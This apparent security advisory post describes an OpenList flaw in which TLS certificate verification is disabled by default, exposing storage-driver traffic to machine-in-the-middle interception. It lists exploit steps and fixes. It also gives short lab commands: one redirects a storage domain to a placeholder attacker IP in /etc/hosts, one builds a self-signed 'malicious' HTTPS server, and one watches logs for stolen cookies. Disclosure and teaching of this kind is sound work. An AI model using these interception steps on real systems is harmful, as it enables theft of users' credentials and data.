Listen to this Post
The vulnerability exists in the `DefaultConfig()` function within internal/conf/config.go, where the `TlsInsecureSkipVerify` parameter is set to `true` by default. This configuration disables TLS certificate verification for all outgoing HTTPS connections made by the application’s storage drivers. When the application communicates with a cloud storage provider (e.g., Weiyun), it initiates a TLS handshake but does not validate the server’s certificate chain, issuer, or hostname.
An attacker can exploit this by performing a Machine-in-the-Middle (MitM) attack via ARP spoofing, DNS hijacking, or a rogue network access point. By redirecting traffic to a server they control, the attacker presents any TLS certificate—valid, self-signed, or expired. Since verification is skipped, the vulnerable application accepts this certificate and establishes an encrypted connection with the attacker’s server, believing it to be legitimate. All subsequent data, including authentication tokens, cookies, and file contents, is transmitted through this channel, allowing the attacker to fully decrypt, steal, and manipulate the data stream without detection.
Platform: Openlist
Version: All versions
Vulnerability: Default TLS verification disabled
Severity: Critical
date: 2025-12-18
Prediction: Patch 2026-03-18
What Undercode Say:
Simulate DNS hijacking within container docker exec -it openlist /bin/sh -c "echo '<ATTACKER_IP> www.weiyun.com' >> /etc/hosts" Build malicious HTTPS server openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout certs/server.key -out certs/server.crt docker build -t httpd-test-ssl . Monitor stolen data tail -f /usr/local/apache2/logs/headers.log | grep "Cookie:"
How Exploit:
1. Attacker positions on network (Wi-Fi/LAN).
2. Redirects storage domain via ARP/DNS spoofing.
3. Hosts malicious TLS endpoint.
4. Vulnerable app connects, sends secrets.
5. Attacker logs/intercepts all data.
Protection from this CVE:
1. Set `TlsInsecureSkipVerify: false`.
2. Enforce certificate pinning.
3. Use VPN/secure network.
4. Patch application immediately.
Impact:
Full data decryption
Authentication theft
Storage manipulation
Integrity loss
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

